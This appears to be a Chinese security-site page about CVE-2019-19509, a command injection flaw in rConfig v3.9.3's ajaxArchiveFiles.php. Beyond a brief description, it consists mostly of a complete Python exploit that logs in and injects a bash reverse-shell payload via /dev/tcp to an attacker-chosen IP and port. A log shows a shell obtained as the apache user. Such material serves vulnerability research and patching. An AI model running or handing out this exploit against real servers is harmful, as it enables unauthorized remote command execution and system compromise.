menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2019-19509)rConfig v3.9.3 后台远程命令执行漏洞 chevron_right (CVE-2019-19509)rConfig v3.9.3 后台远程命令执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2019-19509)rConfig v3.9.3 后台远程命令执行漏洞.md
    3.09 KB / 2021-07-15 20:02:31
        (CVE-2019-19509)rConfig v3.9.3 后台远程命令执行漏洞
=====================================================

一、漏洞简介
------------

rConfig是一款开源的网络配置管理实用程序。 rConfig
3.9.3版本中存在安全漏洞,该漏洞源于程序没有进行过滤就直接将'path'参数传输到'exec'函数。远程攻击者可通过向ajaxArchiveFiles.php文件发送GET请求利用该漏洞执行系统命令。

二、漏洞影响
------------

rConfig v3.9.3

三、复现过程
------------

    python3 CVE-2019-19509.py https://192.168.43.34 admin root 192.168.43.245 8081
    # rconfig - CVE-2019-19509 - Web authenticated RCE
    # [+] Logged in successfully, triggering the payload...
    # [+] Check your listener !
    # ...
    # $ nc -nvlp 8081
    # listening on [any] 8081 ...
    # connect to [192.168.43.245] from (UNKNOWN) [192.168.43.34] 34458
    # bash: no job control in this shell
    # bash-4.2$ id
    # id
    # uid=48(apache) gid=48(apache) groups=48(apache)
    # bash-4.2$ 

> CVE-2019-19509.py

    #!/usr/bin/python3

    # Exploit Title: rConfig <= v3.9.3 Authenticated Remote Code Execution
    # Date: 07/11/2019
    # CVE-2019-19509
    # Exploit Author: vikingfr
    # Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)
    # Software Link : http://files.rconfig.com/downloads/scripts/centos7_install.sh
    # Version: tested v3.9.3
    # Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24
    #
    # Notes : If you want to reproduce in your lab environment follow those links :
    # http://help.rconfig.com/gettingstarted/installation
    # then
    # http://help.rconfig.com/gettingstarted/postinstall

    import requests
    import sys
    import urllib.parse
    from requests.packages.urllib3.exceptions import InsecureRequestWarning
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

    print ("rconfig - CVE-2019-19509 - Web authenticated RCE")

    if len(sys.argv) != 6:
        print ("[+] Usage : ./rconfig_exploit.py https://target username password yourIP yourPort")
        exit()

    target = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    ip = sys.argv[4]
    port = sys.argv[5]
    payload = '''`bash -i>& /dev/tcp/{0}/{1} 0>&1`'''.format(ip, port)

    request = requests.session()

    login_info = {
        "user": username,
        "pass": password,
        "sublogin": 1
    }

    login_request = request.post(
        target+"/lib/crud/userprocess.php",
         login_info,
         verify=False,
         allow_redirects=True
     )

    dashboard_request = request.get(target+"/dashboard.php", allow_redirects=False)

    if dashboard_request.status_code == 200:
        print ("[+] Logged in successfully, triggering the payload...")
        encoded_request = target+"/lib/ajaxHandlers/ajaxArchiveFiles.php?path={0}&ext=random".format(urllib.parse.quote(payload))
        print ("[+] Check your listener !")
        exploit_req = request.get(encoded_request)

    elif dashboard_request.status_code == 302:
        print ("[-] Wrong credentials !")
        exit()
    links
    file_download